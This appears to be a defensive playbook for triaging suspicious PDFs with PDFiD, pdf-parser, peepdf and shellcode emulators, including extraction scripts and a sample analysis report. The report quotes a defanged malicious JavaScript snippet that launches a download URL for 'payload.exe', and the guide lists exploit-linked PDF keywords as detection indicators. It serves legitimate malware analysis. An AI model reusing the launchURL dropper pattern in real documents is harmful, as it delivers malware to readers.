Analyzing PDF Malware with PDFiD
When to Use
- A suspicious PDF attachment has been flagged by email security or reported by a user
- You need to determine if a PDF contains embedded JavaScript, shellcode, or exploit code
- Triaging PDF documents before opening them in a sandbox or analysis environment
- Extracting embedded executables, scripts, or URLs from malicious PDF objects
- Analyzing PDF exploit kits targeting Adobe Reader or other PDF viewer vulnerabilities
Do not use for analyzing the rendered visual content of a PDF; this is for structural analysis of the PDF file format for malicious objects.
Prerequisites
- Python 3.8+ with Didier Stevens' PDF tools installed (
pip install pdfid pdf-parser) - peepdf installed for interactive PDF analysis (
pip install peepdf) - pdftotext from poppler-utils for extracting text content safely
- YARA with PDF-specific rules for malware family identification
- Isolated analysis VM without a PDF reader installed (prevent accidental opening)
- CyberChef for decoding embedded Base64, hex, or deflate streams
Workflow
Step 1: Initial Triage with PDFiD
Scan the PDF for suspicious keywords and structures:
# Run PDFiD to identify suspicious elements
pdfid suspect.pdf
# Expected output analysis:
# /JS - JavaScript (HIGH risk)
# /JavaScript - JavaScript object (HIGH risk)
# /AA - Auto-Action triggered on open (HIGH risk)
# /OpenAction - Action on document open (HIGH risk)
# /Launch - Launch external application (HIGH risk)
# /EmbeddedFile - Embedded file (MEDIUM risk)
# /RichMedia - Flash content (MEDIUM risk)
# /ObjStm - Object stream (used for obfuscation)
# /URI - URL reference (contextual risk)
# /AcroForm - Interactive form (MEDIUM risk)
# Run with extra detail
pdfid -e suspect.pdf
# Run with disarming (rename suspicious keywords)
pdfid -d suspect.pdf
PDFiD Risk Assessment:
━━━━━━━━━━━━━━━━━━━━━
HIGH RISK indicators (any count > 0):
/JS, /JavaScript -> Embedded JavaScript code
/AA -> Automatic Action (triggers without user interaction)
/OpenAction -> Code runs when document is opened
/Launch -> Can launch external executables
/JBIG2Decode -> Associated with CVE-2009-0658 exploit
MEDIUM RISK indicators:
/EmbeddedFile -> Contains embedded files (could be EXE/DLL)
/RichMedia -> Flash/multimedia (Flash exploits)
/AcroForm -> Form with possible submit action
/XFA -> XML Forms Architecture (complex attack surface)
LOW RISK indicators:
/ObjStm -> Object streams (obfuscation technique)
/URI -> External URL references
/Page -> Number of pages (context only)
Step 2: Parse PDF Structure with pdf-parser
Examine suspicious objects identified by PDFiD:
# List all objects referencing JavaScript
pdf-parser --search "/JavaScript" suspect.pdf
pdf-parser --search "/JS" suspect.pdf
# List all objects with OpenAction
pdf-parser --search "/OpenAction" suspect.pdf
# Extract a specific object by ID (example: object 5)
pdf-parser --object 5 suspect.pdf
# Extract and decompress stream content
pdf-parser --object 5 --filter --raw suspect.pdf
# Search for embedded files
pdf-parser --search "/EmbeddedFile" suspect.pdf
# List all objects with their types
pdf-parser --stats suspect.pdf
Step 3: Extract and Analyze Embedded JavaScript
Pull out JavaScript code from PDF objects:
# Extract JavaScript using pdf-parser
pdf-parser --search "/JS" --raw --filter suspect.pdf > extracted_js.txt
# Alternative: Use peepdf for interactive JavaScript extraction
peepdf -f -i suspect.pdf << 'EOF'
js_analyse
EOF
# peepdf interactive commands for JS analysis:
# js_analyse - Extract and show all JavaScript code
# js_beautify - Format extracted JavaScript
# js_eval <object> - Evaluate JavaScript in sandboxed environment
# object <id> - Display object content
# rawobject <id> - Display raw object bytes
# stream <id> - Display decompressed stream
# offsets - Show object offsets in file
# Python script for comprehensive PDF JavaScript extraction
import subprocess
import re
# Extract all streams and search for JavaScript
result = subprocess.run(
["pdf-parser", "--stats", "suspect.pdf"],
capture_output=True, text=True
)
# Find object IDs containing JavaScript references
js_objects = []
for line in result.stdout.split('\n'):
if '/JavaScript' in line or '/JS' in line:
obj_id = re.search(r'obj (\d+)', line)
if obj_id:
js_objects.append(obj_id.group(1))
# Extract each JavaScript-containing object
for obj_id in js_objects:
result = subprocess.run(
["pdf-parser", "--object", obj_id, "--filter", "--raw", "suspect.pdf"],
capture_output=True, text=True
)
print(f"\n=== Object {obj_id} ===")
print(result.stdout[:2000])
Step 4: Analyze Embedded Shellcode
Extract and examine shellcode from PDF exploits:
# Extract raw stream data for shellcode analysis
pdf-parser --object 7 --filter --raw --dump shellcode.bin suspect.pdf
# Analyze shellcode with scdbg (shellcode debugger)
scdbg /f shellcode.bin
# Alternative: Use speakeasy for shellcode emulation
python3 -c "
import speakeasy
se = speakeasy.Speakeasy()
sc_addr = se.load_shellcode('shellcode.bin', arch='x86')
se.run_shellcode(sc_addr, count=1000)
# Review API calls made by shellcode
for event in se.get_report()['api_calls']:
print(f\"{event['api']}: {event['args']}\")
"
# Use CyberChef to decode hex/base64 encoded shellcode
# Input: Extracted stream data
# Recipe: From Hex -> Disassemble x86
Step 5: Extract Embedded Files and URLs
Pull out embedded executables and linked resources:
# Extract embedded files from PDF
import subprocess
import hashlib
# Find embedded file objects
result = subprocess.run(
["pdf-parser", "--search", "/EmbeddedFile", "--raw", "--filter", "suspect.pdf"],
capture_output=True
)
# Extract embedded PE files by searching for MZ header
with open("suspect.pdf", "rb") as f:
data = f.read()
# Search for embedded PE files
offset = 0
while True:
pos = data.find(b'MZ', offset)
if pos == -1:
break
# Verify PE signature
if pos + 0x3C < len(data):
pe_offset = int.from_bytes(data[pos+0x3C:pos+0x40], 'little')
if pos + pe_offset + 2 < len(data) and data[pos+pe_offset:pos+pe_offset+2] == b'PE':
print(f"Embedded PE found at offset 0x{pos:X}")
# Extract (estimate size or use PE header)
embedded = data[pos:pos+100000] # Initial extraction
sha256 = hashlib.sha256(embedded).hexdigest()
with open(f"embedded_{pos:X}.exe", "wb") as out:
out.write(embedded)
print(f" SHA-256: {sha256}")
offset = pos + 1
# Extract URLs from PDF
result = subprocess.run(
["pdf-parser", "--search", "/URI", "--raw", "suspect.pdf"],
capture_output=True, text=True
)
urls = re.findall(r'(https?://[^\s<>"]+)', result.stdout)
for url in set(urls):
print(f"URL: {url}")
Step 6: Generate Analysis Report
Document all findings from the PDF analysis:
Analysis should cover:
- PDFiD triage results (suspicious keyword counts)
- PDF structure anomalies (object streams, cross-reference issues)
- Extracted JavaScript code (deobfuscated if needed)
- Shellcode analysis results (API calls, network indicators)
- Embedded files extracted with hashes
- URLs and external references
- CVE identification if a known exploit is detected
- YARA rule matches against known PDF malware families
Key Concepts
| Term | Definition |
|---|---|
| PDF Object | Basic building block of a PDF file; objects can contain streams (compressed data), dictionaries, arrays, and references to other objects |
| OpenAction | PDF dictionary entry specifying an action to execute when the document is opened; commonly used to trigger JavaScript exploits |
| PDF Stream | Compressed data within a PDF object that can contain JavaScript, images, embedded files, or shellcode; typically FlateDecode compressed |
| FlateDecode | Zlib/deflate compression filter applied to PDF streams; must be decompressed to analyze contents |
| ObjStm (Object Stream) | PDF feature storing multiple objects within a single compressed stream; used by malware to hide suspicious objects from simple parsers |
| JBIG2 | Image compression standard in PDFs; historical source of exploits (CVE-2009-0658, CVE-2021-30860 FORCEDENTRY) |
| PDF JavaScript API | Adobe-specific JavaScript extensions available in PDF documents for form manipulation, network access, and OS interaction |
Tools & Systems
- PDFiD: Didier Stevens' tool for scanning PDF documents for suspicious keywords and structures without parsing the full document
- pdf-parser: Companion tool to PDFiD for detailed PDF object extraction, stream decompression, and content analysis
- peepdf: Python-based PDF analysis tool providing interactive shell for object inspection and JavaScript extraction
- QPDF: PDF transformation tool for linearizing, decrypting, and restructuring PDFs for easier analysis
- scdbg: Shellcode analysis tool that emulates x86 shellcode execution and logs API calls
Common Scenarios
Scenario: Triaging a Phishing PDF with Embedded JavaScript
Context: Email gateway flagged a PDF attachment with suspicious JavaScript indicators. The security team needs to determine if it contains an exploit or a social engineering redirect.
Approach:
- Run PDFiD to confirm /JS, /JavaScript, and /OpenAction presence and counts
- Use pdf-parser to extract the OpenAction object and follow its reference chain
- Extract the JavaScript code from the referenced stream object (apply FlateDecode filter)
- Deobfuscate the JavaScript (decode hex strings, resolve eval chains)
- Determine if the script exploits a PDF reader vulnerability (check for heap spray, ROP chains) or performs a redirect
- Extract all URLs, IPs, and embedded files as IOCs
- Classify the sample: exploit (specific CVE) or social engineering (redirect/phishing)
Pitfalls:
- Opening the PDF in a standard reader instead of analyzing it with command-line tools
- Missing JavaScript hidden inside Object Streams (/ObjStm) that PDFiD detects but simple parsers miss
- Not decompressing streams before analysis (FlateDecode, ASCIIHexDecode, ASCII85Decode filters)
- Assuming the absence of /JS means no JavaScript; code can be embedded in form fields (/AcroForm with /XFA)
Output Format
PDF MALWARE ANALYSIS REPORT
==============================
File: invoice_2025.pdf
SHA-256: e3b0c44298fc1c149afbf4c8996fb924...
File Size: 45,312 bytes
PDF Version: 1.7
PDFID TRIAGE
/JS: 1 [HIGH RISK]
/JavaScript: 1 [HIGH RISK]
/OpenAction: 1 [HIGH RISK]
/EmbeddedFile: 0
/Launch: 0
/URI: 2
/Page: 1
/ObjStm: 1 [OBFUSCATION]
SUSPICIOUS OBJECTS
Object 5: /OpenAction -> references Object 8
Object 8: /JavaScript stream (FlateDecode, 2,847 bytes decompressed)
Object 12: /ObjStm containing objects 15-18
EXTRACTED JAVASCRIPT
Layer 1: eval(unescape("%68%65%6C%6C%6F"))
Layer 2: var url = "hxxp://malicious[.]com/payload.exe";
app.launchURL(url, true);
// Social engineering redirect, not exploit
EXTRACTED IOCs
URLs: hxxp://malicious[.]com/payload.exe
hxxps://fake-login[.]com/adobe/verify
Domains: malicious[.]com, fake-login[.]com
CLASSIFICATION
Type: Social Engineering (URL redirect)
CVE: None (no exploit code detected)
Risk: HIGH (downloads executable payload)
Family: Generic PDF Dropper